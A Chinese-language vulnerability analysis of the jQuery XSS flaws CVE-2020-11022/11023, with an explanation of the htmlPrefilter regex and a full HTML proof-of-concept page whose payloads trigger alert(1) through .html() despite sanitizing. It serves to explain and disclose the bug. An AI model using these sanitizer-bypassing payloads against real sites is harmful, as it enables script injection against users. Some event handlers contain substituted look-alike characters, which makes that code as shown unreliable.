漏洞詳情
jQuery是美國John Resig程式員的一套開源、跨浏覽器的JavaScript庫。 jQuery 大于或等于1.2至3.5.0的版本中存在跨站腳本漏洞,該漏洞源于WEB應用缺少對用戶端資料的正确驗證。即使執行sanitize處理,也仍會執行将來自不受信任來源的HTML傳遞給jQuery的DOM操作方法(即html()、.append()等),攻擊者可利用該漏洞執行用戶端代碼。
漏洞影響
V 1.2.0 <= jquery < V 3.5.0
漏洞分析
在html()方法中,HTML字元串将作為參數傳遞到 $ .htmlPrefilter()方法進行處理。 $ .htmlPrefilter()方法用于替換自閉合标簽,有點類似标簽自動補全。比如将<span/> 替換為 <span></span>。
3.x版本之前使用的正則為:
rxhtmlTag =/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:-]+)[^>]*)\/>/gi
[...]
htmlPrefilter: function( html ) {
return html.replace(rxhtmlTag, "<$1></$2>" );
}
3.x之後使用的正則為:
rxhtmlTag =/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi
因為這個特性可以構造适合jQuery3.x的payload如下:
<img alt="<x" title="/><img src=xοnerrοr=alert(1)>
因為這裡的xss payload是作為屬性出現,是以可以繞過sanitize規則。該payload使用html()方法執行後會變為:
<img alt="<x" title="/></x”><imgsrc=x οnerrοr=alert(1)>
該正則會将 x" 識别為标簽,并新增 /x" 來閉合标簽,進而執行XSS的payload。
漏洞利用
通路本地搭建好html測試頁面
點選 Append via .html() 即可觸發彈窗:
html頁面POC代碼如下:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.js"></script>
</head>
<body>
<script>
function test(n,jq){
sanitizedHTML = document.getElementById('poc'+n).innerHTML;
if(jq){
$('#div').html(sanitizedHTML);
}else{
div.innerHTML=sanitizedHTML;
}
}
</script>
<h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1>
<p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/" target="_blank" rel="external nofollow" >jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html" target="_blank" rel="external nofollow" >English</a> / <a href="//masatokinugawa.l0.cm/2020/05/jquery3.5.0-xss.html" target="_blank" rel="external nofollow" >日本語</a></p>
<h2>PoC 1</h2>
<button οnclick="test(1)">Assign to innerHTML</button> <button οnclick="test(1,true)">Append via .html()</button>
<xmp id="poc1">
<style><style /><img src=x οnerrοr=alert(1)>
</xmp>
<h2>PoC 2 (Only jQuery 3.x affected)</h2>
<button οnclick="test(2)">Assign to innerHTML</button> <button οnclick="test(2,true)">Append via .html()</button>
<xmp id="poc2">
<img alt="<x" title="/><img src=x οnerrοr=alert(1)>">
</xmp>
<h2>PoC 3</h2>
<button οnclick="test(3)">Assign to innerHTML</button> <button οnclick="test(3,true)">Append via .html()</button>
<xmp id="poc3">
<option><style></option></select><img src=x οnerrοr=alert(1)></style>
</xmp>
<div id="div"></div>
</body>
</html>
參考:
https://mp.weixin.qq.com/s/QW5v5d7829m0Pz6AA6_XPQ